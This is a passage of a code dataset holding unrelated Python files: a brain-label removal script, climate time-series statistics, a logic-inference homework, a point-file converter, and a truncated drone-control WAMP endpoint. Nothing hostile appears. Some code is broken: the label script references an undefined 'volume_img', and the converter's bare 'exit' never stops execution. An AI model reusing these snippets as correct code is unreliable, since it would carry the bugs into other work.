atlas volumes.\n\n >>> scil_remove_labels.py DKT_labels.nii out_labels.nii.gz -i 5001 5002\n\"\"\"\n\n\nimport argparse\nimport logging\n\nimport nibabel as nib\nimport numpy as np\n\nfrom scilpy.io.image import get_data_as_label\nfrom scilpy.io.utils import (add_overwrite_arg, assert_inputs_exist,\n assert_outputs_exist)\nEPILOG = \"\"\"\n References:\n [1] Al-Sharif N.B., St-Onge E., Vogel J.W., Theaud G.,\n Evans A.C. and Descoteaux M. OHBM 2019.\n Surface integration for connectome analysis in age prediction.\n \"\"\"\n\n\ndef _build_arg_parser():\n p = argparse.ArgumentParser(description=__doc__, epilog=EPILOG,\n formatter_class=argparse.RawTextHelpFormatter)\n\n p.add_argument('in_labels',\n help='Input labels volume.')\n\n p.add_argument('out_labels',\n help='Output labels volume.')\n\n p.add_argument('-i', '--indices', type=int, nargs='+', required=True,\n help='List of labels indices to remove.')\n\n p.add_argument('--background', type=int, default=0,\n help='Integer used for removed labels [%(default)s].')\n add_overwrite_arg(p)\n return p\n\n\ndef main():\n parser = _build_arg_parser()\n args = parser.parse_args()\n\n assert_inputs_exist(parser, args.in_labels)\n assert_outputs_exist(parser, args, args.out_labels)\n\n # Load volume\n label_img = nib.load(args.in_labels)\n labels_volume = get_data_as_label(label_img)\n\n # Remove given labels from the volume\n for index in np.unique(args.indices):\n mask = labels_volume == index\n labels_volume[mask] = args.background\n if np.count_nonzero(mask) == 0:\n logging.warning(\"Label {} was not in the volume\".format(index))\n\n # Save final volume\n nii = nib.Nifti1Image(labels_volume, volume_img.affine, volume_img.header)\n nib.save(nii, args.out_labels)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/scil_remove_labels.py","file_name":"scil_remove_labels.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"138268458","text":"\"\"\"Objects dealing with timeseries and ensemble statistics.\"\"\"\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport scipy.stats as ss\nimport xarray as xr\nfrom scipy.signal import periodogram\nfrom scipy.stats import norm\n\nfrom xskillscore import pearson_r, pearson_r_p_value\n\n\n# --------------------------------------------#\n# HELPER FUNCTIONS\n# Should only be used internally by esmtools.\n# --------------------------------------------#\ndef _check_xarray(x):\n \"\"\"Check if the object being submitted is either a Dataset or DataArray.\"\"\"\n if not (isinstance(x, xr.DataArray) or isinstance(x, xr.Dataset)):\n typecheck = type(x)\n raise IOError(f\"\"\"The input data is not an xarray object (an xarray\n DataArray or Dataset). esmtools is built to wrap xarray to make\n use of its awesome features. Please input an xarray object and\n retry the function.\n\n Your input was of type: {typecheck}\"\"\")\n\n\ndef _get_coords(da):\n return list(da.coords)\n\n\ndef _get_dims(da):\n return list(da.dims)\n\n\ndef _get_vars(ds):\n return list(ds.data_vars)\n\n\n# ----------------------------------#\n# TIME SERIES\n# Functions related to time series.\n# ----------------------------------#\ndef xr_corr(x, y, dim='time', lag=0, return_p=False):\n \"\"\"Computes the Pearson product-moment coefficient of linear correlation.\n\n This version calculates the effective degrees of freedom, accounting\n for autocorrelation within each time series that could fluff the\n significance of the correlation.\n\n References:\n * Wilks, Daniel S. Statistical methods in the atmospheric sciences.\n Vol. 100. Academic press, 2011.\n * Lovenduski, Nicole S., and Nicolas Gruber. \"Impact of the Southern\n Annular Mode on Southern Ocean circulation and biology.\" Geophysical\n Research Letters 32.11 (2005).\n\n Todo:\n * Test and adapt for xr.Datasets\n\n Args:\n x (xarray object): Independent variable time series or grid of time\n series.\n y (xarray object): Dependent variable time series or grid of time\n series\n dim (optional str): Correlation dimension\n lag (optional int): Lag to apply to correlaton, with x predicting y.\n return_p (optional bool): If True, return correlation coefficients\n as well as p values.\n Returns:\n Pearson correlation coefficients\n\n If return_p True, associated p values.\n\n \"\"\"\n _check_xarray(x)\n _check_xarray(y)\n if lag != 0:\n N = x[dim].size\n normal = x.isel({dim: slice(0, N-lag)})\n shifted = y.isel({dim: slice(0 + lag, N)})\n if dim not in list(x.coords):\n normal[dim] = np.arange(1, N)\n shifted[dim] = normal[dim]\n r = pearson_r(normal, shifted, dim)\n else:\n r = pearson_r(x, y, dim)\n if return_p:\n p = _xr_eff_p_value(x, y, r, dim)\n # return with proper dimension labeling. would be easier with\n # apply_ufunc, but having trouble getting it to work here. issue\n # probably has to do with core dims.\n dimlist = _get_dims(r)\n for i in range(len(dimlist)):\n p = p.rename({'dim_' + str(i): dimlist[i]})\n return r, p\n else:\n return r\n\n\ndef _xr_eff_p_value(x, y, r, dim):\n \"\"\"Computes p values accounting for autocorrelation in time series.\n\n Args:\n x (xarray object): Independent time series.\n y (xarray object): Dependent time series.\n r (xarray object): Pearson correlations between x and y.\n dim (str): Dimension to compute compute p values over.\n\n Returns:\n p values accounting for autocorrelation in input time series.\n\n References:\n * Wilks, Daniel S. Statistical methods in the atmospheric sciences.\n Vol. 100. Academic press, 2011.\n \"\"\"\n def _compute_autocorr(v, dim, n):\n \"\"\"\n Return normal and shifted time series\n with equal dimensions so as not to\n throw an error.\n \"\"\"\n shifted = v.isel({dim: slice(1, n)})\n normal = v.isel({dim: slice(0, n-1)})\n # see explanation in xr_autocorr for this\n if dim not in list(v.coords):\n normal[dim] = np.arange(1, n)\n shifted[dim] = normal[dim]\n return pearson_r(shifted, normal, dim)\n\n n = x[dim].size\n # find autocorrelation\n xa, ya = x - x.mean(dim), y - y.mean(dim)\n xauto = _compute_autocorr(xa, dim, n)\n yauto = _compute_autocorr(ya, dim, n)\n # compute effective sample size\n n_eff = n * (1 - xauto * yauto) / (1 + xauto * yauto)\n n_eff = np.floor(n_eff)\n # constrain n_eff to be at maximum the total number of samples\n n_eff = n_eff.where(n_eff <= n, n)\n # compute t-statistic\n t = r * np.sqrt((n_eff - 2) / (1 - r**2))\n p = xr.DataArray(ss.t.sf(np.abs(t), n_eff - 2) * 2)\n return p\n\n\ndef xr_rm_poly(ds, order, dim='time'):\n \"\"\"Returns xarray object with nth-order fit removed.\n\n Args:\n ds (xarray object): Time series to be detrended.\n order (int): Order of polynomial fit to be removed.\n dim (optional str): Dimension over which to remove the polynomial fit.\n\n Returns:\n xarray object with polynomial fit removed.\n \"\"\"\n _check_xarray(ds) # this could be a decorator I think?\n\n if dim not in ds.dims:\n raise KeyError(\n f\"Input dim, '{dim}', was not found in the ds; \"\n f\"found only the following dims: {list(ds.dims)}.\"\n )\n\n # handle both datasets and dataarray\n if isinstance(ds, xr.Dataset):\n da = ds.to_array()\n return_ds = True\n else:\n da = ds.copy()\n return_ds = False\n\n da_dims_orig = list(da.dims) # orig -> original\n if len(da_dims_orig) > 1:\n # want independent axis to be the leading dimension\n da_dims_swap = da_dims_orig.copy() # copy to prevent contamination\n\n # https://stackoverflow.com/questions/1014523/\n # simple-syntax-for-bringing-a-list-element-to-the-front-in-python\n da_dims_swap.insert(0, da_dims_swap.pop(da_dims_swap.index(dim)))\n da = da.transpose(*da_dims_swap)\n\n # hide other dims into a single dim\n da = da.stack({'other_dims': da_dims_swap[1:]})\n dims_swapped = True\n else:\n dims_swapped = False\n\n # NaNs will make the polyfit fail--interpolate any NaNs in\n # the provided dim to prevent poor fit, while other dims' NaNs\n # will be filled with 0s; however, all NaNs will be replaced\n # in the final output\n nan_locs = np.isnan(da.values)\n\n # any(nan_locs.sum(axis=0)) fails if not 2D\n if nan_locs.ndim == 1:\n nan_locs = nan_locs.reshape(len(nan_locs), 1)\n nan_reshaped = True\n else:\n nan_reshaped = False\n\n # check if there's any NaNs in the provided dim because\n # interpolate_na is computationally expensive to run regardless of NaNs\n if any(nan_locs.sum(axis=0)) > 0:\n if any(nan_locs[0, :]):\n # [np.nan, 1, 2], no first value to interpolate from; back fill\n da = da.bfill(dim)\n elif any(nan_locs[-1, :]):\n # [0, 1, np.nan], no last value to interpolate from; forward fill\n da = da.ffill(dim)\n else: # [0, np.nan, 2], can interpolate\n da = da.interpolate_na(dim)\n\n # this handles the other axes; doesn't matter since it won't affect the fit\n da = da.fillna(0)\n\n # the actual operation of detrending\n y = da.values\n x = np.arange(0, len(y), 1)\n coefs = poly.polyfit(x, y, order)\n fit = poly.polyval(x, coefs)\n y_dt = y - fit.transpose() # dt -> detrended\n da.data[:] = y_dt\n\n # replace back the filled NaNs (keep values where not NaN)\n if nan_reshaped:\n nan_locs = nan_locs[:, 0]\n da = da.where(~nan_locs)\n\n if dims_swapped:\n # revert the other dimensions to its original form and ordering\n da = da.unstack('other_dims').transpose(*da_dims_orig)\n\n if return_ds:\n # revert back into a dataset\n return xr.merge(da.sel(variable=var).rename(var).drop('variable')\n for var in da['variable'].values)\n else:\n return da\n\n\ndef xr_rm_trend(da, dim='time'):\n \"\"\"Calls ``xr_rm_poly`` with an order 1 argument.\"\"\"\n return xr_rm_poly(da, 1, dim=dim)\n\n\n# # TODO: coords lon, lat get lost for curvilinear ds\ndef xr_varweighted_mean_period(ds, time_dim='time'):\n \"\"\"Calculate the variance weighted mean period of time series.\n\n ..math:\n P_x = \\sum_k V(f_k,x) / \\sum_k f_k V(f_k,x)\n\n Reference:\n * Branstator, Grant, and Haiyan Teng. “Two Limits of Initial-Value\n Decadal Predictability in a CGCM.\" Journal of Climate 23, no. 23\n (August 27, 2010): 6292-6311. https://doi.org/10/bwq92h.\n\n Args:\n ds (xarray object): Time series.\n time_dim (optional str): Name of time dimension.\n\n \"\"\"\n _check_xarray(ds)\n\n def _create_dataset(ds, f, Pxx, time_dim):\n \"\"\"\n Organize results of periodogram into clean dataset.\n \"\"\"\n dimlist = [i for i in _get_dims(ds) if i not in [time_dim]]\n PSD = xr.DataArray(Pxx, dims=['freq'] + dimlist)\n PSD.coords['freq'] = f\n return PSD\n\n f, Pxx = periodogram(ds, axis=0, scaling='spectrum')\n PSD = _create_dataset(ds, f, Pxx, time_dim)\n T = PSD.sum('freq') / ((PSD * PSD.freq).sum('freq'))\n return T\n\n\ndef xr_autocorr(ds, lag=1, dim='time', return_p=False):\n \"\"\"Calculate the lagged correlation of time series.\n\n Args:\n ds (xarray object): Time series or grid of time series.\n lag (optional int): Number of time steps to lag correlate to.\n dim (optional str): Name of dimension to autocorrelate over.\n return_p (optional bool): If True, return correlation coefficients\n and p values.\n\n Returns:\n Pearson correlation coefficients.\n\n If return_p, also returns their associated p values.\n \"\"\"\n _check_xarray(ds)\n N = ds[dim].size\n normal = ds.isel({dim: slice(0, N - lag)})\n shifted = ds.isel({dim: slice(0 + lag, N)})\n \"\"\"\n xskillscore pearson_r looks for the dimensions to be matching, but we\n shifted them so they probably won't be. This solution doesn't work\n if the user provides a dataset without a coordinate for the main\n dimension, so we need to create a dummy dimension in that case.\n \"\"\"\n if dim not in list(ds.coords):\n normal[dim] = np.arange(1, N)\n shifted[dim] = normal[dim]\n r = pearson_r(normal, shifted, dim)\n if return_p:\n # NOTE: This assumes 2-tailed. Need to update xr_eff_pearsonr\n # to utilize xskillscore's metrics but then compute own effective\n # p-value with option for one-tailed.\n p = pearson_r_p_value(normal, shifted, dim)\n return r, p\n else:\n return r\n\n\ndef xr_decorrelation_time(da, r=20, dim='time'):\n \"\"\"Calculate the decorrelaton time of a time series.\n\n .. math::\n tau_{d} = 1 + 2 * \\sum_{k=1}^{\\inf}(alpha_{k})^{k}\n\n Reference:\n * Storch, H. v, and Francis W. Zwiers. Statistical Analysis in Climate\n Research. Cambridge ; New York: Cambridge University Press, 1999.,\n p.373\n\n Args:\n da (xarray object): Time series.\n r (optional int): Number of iterations to run the above formula.\n dim (optional str): Time dimension for xarray object.\n\n Returns:\n Decorrelation time of time series.\n\n \"\"\"\n _check_xarray(da)\n one = da.mean(dim) / da.mean(dim)\n return one + 2 * xr.concat([xr_autocorr(da, dim=dim, lag=i) ** i for i in\n range(1, r)], 'it').sum('it')\n\n\n# --------------------------------------------#\n# Diagnostic Potential Predictability (DPP)\n# Functions related to DPP from Boer et al.\n# --------------------------------------------#\n# # TODO: coords lon, lat get lost for curvilinear ds\ndef DPP(ds, m=10, chunk=True):\n \"\"\"\n Calculate Diagnostic Potential Predictability (DPP) as potentially\n predictable variance fraction (ppvf) in Boer 2004.\n\n Note: Resplandy et al. 2015 and Seferian et al. 2018 calculate unbiased DPP\n in a slightly different way. chunk=False\n\n .. math::\n\n DPP_{\\text{unbiased}}(m)=\\frac{\\sigma^2_m - 1/m \\cdot \\sigma^2}{\\sigma^2}\n\n References:\n * Boer, G. J. “Long Time-Scale Potential Predictability in an Ensemble of\n Coupled Climate Models.” Climate Dynamics 23, no. 1 (August 1, 2004):\n 29–44. https://doi.org/10/csjjbh.\n * Resplandy, L., R. Séférian, and L. Bopp. “Natural Variability of CO2 and\n O2 Fluxes: What Can We Learn from Centuries-Long Climate Models\n Simulations?” Journal of Geophysical Research: Oceans 120, no. 1\n (January 2015): 384–404. https://doi.org/10/f63c3h.\n * Séférian, Roland, Sarah Berthet, and Matthieu Chevallier. “Assessing the\n Decadal Predictability of Land and Ocean Carbon Uptake.” Geophysical\n Research Letters, March 15, 2018. https://doi.org/10/gdb424.\n\n Args:\n ds (xr.DataArray): control simulation with time dimension as years.\n m (optional int): separation time scale in years between predictable\n low-freq component and high-freq noise.\n chunk (optional boolean): Whether chunking is applied. Default: True.\n If False, then uses Resplandy 2015 / Seferian 2018 method.\n\n Returns:\n dpp (xr.DataArray): ds without time dimension.\n\n \"\"\"\n # TODO: rename or find xr equiv\n def _chunking(ds, number_chunks=False, chunk_length=False):\n \"\"\"\n Separate data into chunks and reshapes chunks in a c dimension.\n\n Specify either the number chunks or the length of chunks.\n Needed for DPP.\n\n Args:\n ds (xr.DataArray): control simulation with time dimension as years.\n chunk_length (int): see DPP(m)\n number_chunks (int): number of chunks in the return data.\n\n Returns:\n c (xr.DataArray): chunked ds, but with additional dimension c.\n\n \"\"\"\n if number_chunks and not chunk_length:\n chunk_length = np.floor(ds['time'].size / number_chunks)\n cmin = int(ds['time'].min())\n elif not number_chunks and chunk_length:\n cmin = int(ds['time'].min())\n number_chunks = int(np.floor(ds['time'].size / chunk_length))\n else:\n raise ValueError('set number_chunks or chunk_length to True')\n c = ds.sel(time=slice(cmin, cmin + chunk_length - 1))\n c = c.expand_dims('c')\n c['c'] = [0]\n for i in range(1, number_chunks):\n c2 = ds.sel(time=slice(cmin + chunk_length * i,\n cmin + (i + 1) * chunk_length - 1))\n c2 = c2.expand_dims('c')\n c2['c'] = [i]\n c2['time'] = c['time']\n c = xr.concat([c, c2], 'c')\n return c\n\n if not chunk: # Resplandy 2015, Seferian 2018\n s2v = ds.rolling(time=m).mean().var('time')\n s2 = ds.var('time')\n\n if chunk: # Boer 2004 ppvf\n # first chunk\n chunked_means = _chunking(\n ds, chunk_length=m).mean('time')\n # sub means in chunks\n chunked_deviations = _chunking(\n ds, chunk_length=m) - chunked_means\n s2v = chunked_means.var('c')\n s2e = chunked_deviations.var(['time', 'c'])\n s2 = s2v + s2e\n dpp = (s2v - s2 / (m)) / s2\n return dpp\n\n\n# -------\n# Z SCORE\n# -------\ndef _z_score(ci):\n \"\"\"Returns critical z score given a confidence interval\n\n Source: https://stackoverflow.com/questions/20864847/\n probability-to-z-score-and-vice-versa-in-python\n \"\"\"\n diff = (100 - ci) / 2\n return norm.ppf((100 - diff) / 100)\n\n\ndef z_significance(r1, r2, N, ci=90):\n \"\"\"Computes the z test statistic for two ACC time series, e.g. an\n initialized ensemble ACC and persistence forecast ACC.\n\n Inputs:\n r1, r2: (xarray objects) time series, grids, etc. of pearson\n correlation coefficients between the two prediction systems\n of interest.\n N: (int) length of original time series being correlated.\n ci: (optional int) confidence level for z-statistic test\n\n Returns:\n Boolean array of same dimensions as input where True means r1 is\n significantly different from r2 at ci.\n\n Reference:\n https://www.statisticssolutions.com/comparing-correlation-coefficients/\n \"\"\"\n def _r_to_z(r):\n \"\"\"Fisher's r to z transformation\"\"\"\n return 0.5 * (np.log(1 + r) - np.log(1 - r))\n\n z1, z2 = _r_to_z(r1), _r_to_z(r2)\n difference = np.abs(z1 - z2)\n zo = difference / (np.sqrt(2*(1 / (N - 3))))\n confidence = np.zeros_like(zo)\n confidence[:] = _z_score(ci)\n sig = xr.DataArray(zo > confidence)\n return sig\n","sub_path":"climpred/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":16950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"51375711","text":"# imports \nimport argparse\nimport re\nfrom copy import deepcopy\n\noutput = open(\"output.txt\", \"w\")\n\nclass Predicate:\n \n def __init__(self, name, nargs):\n self.name = name\n self.nargs = nargs\n self.negation = False\n self.vargs = []\n \n def isNegation(self):\n return self.negation\n\nclass Clause:\n \n def __init__(self, fact=False):\n self.lhs = []\n self.rhs = None\n self.fact = fact\n \n def addLhs(self, predicate):\n self.lhs.append(predicate)\n return\n \n def addRhs(self, predicate):\n self.rhs = predicate\n return\n\n def isFact(self):\n return self.fact\n\ndef printToOutput(qoa, query):\n ostr = query.name + \"(\"\n if query.vargs[0][0].islower():\n ostr = ostr + \"_\"\n else:\n ostr = ostr + query.vargs[0]\n for i in range(1, query.nargs):\n if query.vargs[i][0].islower():\n ostr = ostr + \", \" + \"_\"\n else:\n ostr = ostr + \", \" + query.vargs[i]\n ostr = ostr + \")\\n\" \n output.write(qoa + \": \" + ostr)\n\n\ndef fol_ask_query(clauses, query):\n for resQuery in fol_or(clauses, query):\n if resQuery == None:\n printToOutput(str(False), query)\n return False\n else:\n printToOutput(str(True), resQuery)\n return True\n printToOutput(str(False), query)\n return False\n \ndef fol_ask(clauses, queries):\n \n for query in queries:\n if fol_ask_query(clauses, query) == False:\n return False\n \n return True\n\n\ndef fol_or_reverted(matchedClauses, index, query):\n \n return\n\ndef fol_or(origClauses, query):\n clauses = deepcopy(origClauses)\n matchedClauses = match_clauses(clauses, query)\n origQuery = deepcopy(query)\n if len(matchedClauses) == 0:\n printToOutput(\"Ask\", query)\n yield None\n for clause in matchedClauses:\n printToOutput(\"Ask\", query)\n # clause is fact\n if clause.isFact() == True:\n #isSubstituted = False\n subMap = {}\n ret = True\n newQuery = deepcopy(query)\n if clause.rhs.nargs == query.nargs and clause.rhs.vargs != query.vargs:\n for i in range(clause.rhs.nargs):\n if clause.rhs.vargs[i] != query.vargs[i] and query.vargs[i][0].islower():\n subMap[query.vargs[i]] = clause.rhs.vargs[i]\n #isSubstituted = True\n elif clause.rhs.vargs[i] != query.vargs[i] and query.vargs[i][0].isupper():\n ret = False\n if ret == False:\n continue\n \n for i in range(newQuery.nargs):\n if newQuery.vargs[i] in subMap.keys():\n newQuery.vargs[i] = subMap[query.vargs[i]]\n #return ret, isSubstituted, query\n yield newQuery\n # clause is => : have to perform and search\n else:\n copyClause = deepcopy(clause)\n copyQuery = deepcopy(query)\n unify(copyQuery, copyClause)\n for subMapA in fol_and(copyClause.lhs, origClauses):\n# if subMapA == None:\n# query = deepcopy(origQuery)\n# break\n# else:\n# substituteRHS(copyClause.rhs, subMapA)\n# if equals(query, copyClause.rhs):\n# substituteQuery(copyClause.rhs, query)\n# #return True, True, query\n# yield query\n if subMapA != None:\n newCopyClause = deepcopy(copyClause)\n substituteRHS(newCopyClause.rhs, subMapA)\n if equals(query, newCopyClause.rhs):\n newQuery = deepcopy(query)\n substituteQuery(newCopyClause.rhs, newQuery)\n #return True, True, query\n yield newQuery\n else:\n query = deepcopy(origQuery)\n break\n #if resGot == False:\n # query = deepcopy(origQuery)\n \n #yield None\n return \n #return False, False, query\n\ndef substituteQuery(rhs, query):\n for i in range(query.nargs):\n if query.vargs[i][0].islower() and rhs.vargs[i][0].isupper():\n query.vargs[i] = rhs.vargs[i]\n return\n\ndef equals(query, rhs):\n for j in range(rhs.nargs):\n if rhs.vargs[j] != query.vargs[j]:\n if rhs.vargs[j].isupper() and query.vargs[j].isupper():\n return False\n return True\n \n\ndef fol_and(lhsQueriesOrig, origClauses):\n subMapForAnd = {}\n if len(lhsQueriesOrig) == 0:\n yield subMapForAnd\n else:\n lhsQueries = deepcopy(lhsQueriesOrig)\n firstQuery = lhsQueries[0]\n restAll = lhsQueries[1:]\n oldQuery = deepcopy(firstQuery)\n for resQuery in fol_or(origClauses, firstQuery):\n if resQuery == None:\n printToOutput(\"False\", firstQuery)\n yield None\n return\n else:\n printToOutput(\"True\", resQuery)\n restAllCopy = deepcopy(restAll)\n subMap = substituteLHS(restAllCopy, oldQuery, resQuery)\n subMapForAnd.update(subMap)\n for subMapO in fol_and(restAllCopy, origClauses):\n if subMapO != None and len(subMapO) > 0:\n subMapForAnd.update(subMapO)\n if subMapO == None:\n firstQuery = deepcopy(oldQuery)\n break\n yield subMapForAnd\n \n #yield subMapForAnd\n yield None\n return \n\ndef substituteRHS(rhs, subMapA):\n for j in range(rhs.nargs):\n if rhs.vargs[j] in subMapA.keys():\n rhs.vargs[j] = subMapA[rhs.vargs[j]]\n\ndef substituteLHS(lhsQueries, oldQuery, query):\n \n subMap = {}\n for i in range(oldQuery.nargs):\n if oldQuery.vargs[i][0].islower() and query.vargs[i][0].isupper():\n subMap[oldQuery.vargs[i]] = query.vargs[i]\n \n for pred in lhsQueries:\n for j in range(pred.nargs):\n if pred.vargs[j] in subMap.keys():\n pred.vargs[j] = subMap[pred.vargs[j]]\n \n return subMap\n\ndef unify(query, clause):\n varMap = {}\n for i in range(query.nargs):\n if query.vargs[i][0].isupper() and clause.rhs.vargs[i][0].islower():\n varMap[clause.rhs.vargs[i]] = query.vargs[i]\n clause.rhs.vargs[i] = query.vargs[i]\n \n for pred in clause.lhs:\n for j in range(pred.nargs):\n if pred.vargs[j] in varMap.keys():\n pred.vargs[j] = varMap[pred.vargs[j]]\n \n return query, clause\n\ndef match_clauses(clauses, query):\n matchedClauses = []\n for clause in clauses:\n rhsClause = clause.rhs\n if rhsClause.name == query.name:\n add = True\n for i in range(rhsClause.nargs):\n if rhsClause.vargs[i][0].isupper() and query.vargs[i][0].isupper() and rhsClause.vargs[i] != query.vargs[i]:\n add = False\n if add:\n matchedClauses.append(clause)\n return matchedClauses\n\ndef extractQueries(queryStr):\n \n queries = queryStr.split('&&')\n queryPreds = []\n for i in range(len(queries)):\n qStr = queries[i].strip(' \\t\\n\\r')\n qReg = re.compile(r'(.*)\\((.*)\\)')\n qu = qReg.search(qStr)\n predName = qu.group(1).strip(' \\t\\n\\r')\n predVar = qu.group(2).strip(' \\t\\n\\r').split(',')\n pred = Predicate(predName, len(predVar))\n for j in range(len(predVar)):\n pred.vargs.append(predVar[j].strip(' \\t\\n\\r'))\n queryPreds.append(pred)\n \n return queryPreds\n\ndef parseLHS(lhsStr, clause):\n lhsClauses = lhsStr.split('&&')\n for cStr in lhsClauses:\n cStr = cStr.strip(' \\t\\n\\r')\n cReg = re.compile(r'(.*)\\((.*)\\)')\n factStr = cReg.search(cStr)\n predName = factStr.group(1).strip(' \\t\\n\\r')\n predVar = factStr.group(2).strip(' \\t\\n\\r').split(',')\n if predName[0] == '~':\n pred = Predicate(predName[1:], len(predVar))\n pred.negation = True\n else:\n pred = Predicate(predName, len(predVar))\n for j in range(len(predVar)):\n pred.vargs.append(predVar[j].strip(' \\t\\n\\r'))\n clause.addLhs(pred)\n return\n\ndef parseRHS(rhsStr, clause):\n cReg = re.compile(r'(.*)\\((.*)\\)')\n factStr = cReg.search(rhsStr)\n predName = factStr.group(1).strip(' \\t\\n\\r')\n predVar = factStr.group(2).strip(' \\t\\n\\r').split(',')\n if predName[0] == '~':\n pred = Predicate(predName[1:], len(predVar))\n pred.negation = True\n else:\n pred = Predicate(predName, len(predVar))\n for j in range(len(predVar)):\n pred.vargs.append(predVar[j].strip(' \\t\\n\\r'))\n clause.addRhs(pred)\n return\n\n# main\nif __name__ == \"__main__\":\n clauses = []\n queries = []\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', required=True)\n args = parser.parse_args()\n inFile = args.i\n inF = open(inFile, 'r')\n dataLines = inF.readlines()\n queries = extractQueries(dataLines[0])\n numClauses = int(dataLines[1])\n for i in range(0, numClauses):\n clauseStr = dataLines[2+i].strip(' \\t\\n\\r').split('=>')\n if len(clauseStr) == 2:\n clause = Clause()\n parseLHS(clauseStr[0].strip(' \\t\\n\\r'), clause)\n parseRHS(clauseStr[1].strip(' \\t\\n\\r'), clause)\n clauses.append(clause)\n else:\n clause = Clause(fact=True)\n parseRHS(clauseStr[0], clause)\n clauses.append(clause)\n \n ret = fol_ask(clauses, queries)\n output.write(str(ret))\n ","sub_path":"Assignment_2/hw2cs561s16.py","file_name":"hw2cs561s16.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"74145524","text":"import sys\n# .ntps to .obj\ndef ntps2obj(ntps_file, obj_file):\n with open(ntps_file) as f_in:\n f_out = open(obj_file, 'w')\n for line in f_in:\n xyz_list = line.split(' ')\n f_out.write('v '+line)\n\nif len(sys.argv) < 3:\n print(\"npts to obj:\\nformat_scripts xxx.npts xxx.obj\")\n exit\nntps2obj(sys.argv[1], sys.argv[2])","sub_path":"PythonScript/format_scripts.py","file_name":"format_scripts.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"536868856","text":"# Periscope Quadcopter WAMP Endpoint\n# Evan Widloski - 2017-07-21\n\n#FIXME - script cant handle a pixhawk reset\n#FIXME - script only tries to connect to pixhawk once at startup\nimport sys\n\nfrom twisted.python import log as twisted_log\nfrom twisted.logger import Logger, textFileLogObserver\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet import task\nfrom zope.interface import provider\nimport logging\nimport sys\n\nfrom autobahn.twisted.util import sleep\nfrom autobahn.twisted.wamp import ApplicationSession\nfrom autobahn.wamp.exception import ApplicationError\nfrom socket import error as SocketError\nfrom autobahn import wamp\nfrom dronekit import connect, VehicleMode\nfrom dronekit.lib import APIException\nfrom pymavlink import mavutil\n\nfrom movements import goto_position_target_body_offset_ned, goto_position_target_local_ned\n\n\nlog = Logger()\n# observer = textFileLogObserver(sys.stdout)\n# log.observer.addObserver(observer)\n\n\n# try to connect to pixhawk different ways\nconnections = []\nconnections.append('tcp:localhost:14550')\n\nserial_connections = mavutil.auto_detect_serial(preferred_list=['*FTDI*',\n \"*Arduino_Mega_2560*\",\n \"*3D_Robotics*\",\n \"*USB_to_UART*\",\n '*PX4*',\n '*FMU*'])\nif len(serial_connections) > 0:\n connections.append(str(serial_connections[0]))\n\nfor connection in connections:\n log.info(\"Trying to connect to {}\".format(connection))\n try:\n vehicle = connect(connection, heartbeat_timeout=600)\n log.info(\"Connection to {} succeeded\".format(connection))\n print('connected')\n break\n except Exception as e:\n log.info(\"Connection to {} failed\".format(str(connection)))\nelse:\n log.error(\"Could not connect!\")\n sys.exit(1)\n\nlog.info(\"connected to pixhawk\")\n\nclass QuadcopterSession(ApplicationSession):\n\n\n def __init__(self, *args, **kwargs):\n super(QuadcopterSession, self).__init__(*args, **kwargs)\n self.last_alt = None\n\n\n # ------------------- PUB/SUB ----------------------\n def publish_messages(self, event):\n #FIXME event dicts coming from twisted's logging system are formatted\n # differently depending on whether the message comes from mavlink or\n # this code\n # with open('/tmp/test', 'a') as f:\n # f.write(str(event))\n # f.write('\\n\\n')\n\n print(event)\n # tracebacks\n if 'traceback' in event:\n message = event['traceback']\n # system messages\n if 'message' in event:\n message = event['message']\n # mavlink messages\n elif 'log_io' in event:\n message = event['log_io']\n # log messages\n elif 'log_format' in event:\n message = event['log_format']\n\n self.publish(u'com.quadcopter.messages', message)\n\n # publish changes of flight mode\n def publish_mode(self, vehicle, attr_name, mode):\n self.log.info(\"published mode {}\".format(mode.name))\n self.publish(u'com.quadcopter.mode', mode.name)\n\n # publish changes of num satellites\n def publish_satellites(self, vehicle, attr_name, gps_0):\n self.log.info(\"published satellites {}\".format(gps_0.satellites_visible))\n self.publish(u'com.quadcopter.satellites', gps_0.satellites_visible)\n\n # publish changes of alt in global_relative_frame\n def publish_altitude(self, vehicle, attr_name, global_relative_frame):\n if not global_relative_frame.alt == self.last_alt:\n self.log.info(\"published altitude {}\".format(global_relative_frame.alt))\n self.publish(u'com.quadcopter.altitude', global_relative_frame.alt)\n self.last_alt = global_relative_frame.alt\n\n # publish changes of armed status\n def publish_armed(self, vehicle, attr_name, armed):\n self.log.info(\"published armed {}\".format(armed))\n self.publish(u'com.quadcopter.armed', armed)\n\n\n # ------------------- RPC ----------------------\n\n # translate vehicle in cardinal directions\n def set_translate(self, direction):\n self.log.info(\"moving {}\".format(direction))\n # set vehicle mode\n def set_mode(self, mode):\n self.log.info(\"Changing mode to {}\".format(mode))\n vehicle.mode = VehicleMode(mode)\n # arm or disarm vehicle\n def set_armed(self, armed):\n self.log.info(\"setting armed to {}\".format(armed))\n vehicle.armed = armed\n\n # takeoff to `altitude` meters\n def set_takeoff(self, altitude):\n self.log.info(\"taking off\")\n vehicle.simple_takeoff(altitude)\n\n # go to altitude\n def set_altitude(self, altitude):\n self.log.info(\"going to altitude {}\".format(altitude))\n goto_position_target_local_ned(vehicle, 0, 0, -float(altitude))\n\n # go to relative altitude\n def set_altitude_relative(self, altitude):\n self.log.info(\"adjusting altitude by {}\".format(altitude))\n goto_position_target_body_offset_ned(vehicle, 0, 0, -float(altitude))\n\n\n @inlineCallbacks\n def onJoin(self, details):\n\n # start sending log messages\n log.observer.addObserver(self.publish_messages)\n\n # publish session id so clients know which session is the quadcopter\n yield self.log.info(\"published session id\")\n yield self.publish(u'com.quadcopter.session_id', details.session)\n\n # try connecting to pixhawk, set up publications\n try:\n self.log.info(\"published pixhawk_connection True\")\n self.publish(u'com.quadcopter.pixhawk_connection', True)\n\n 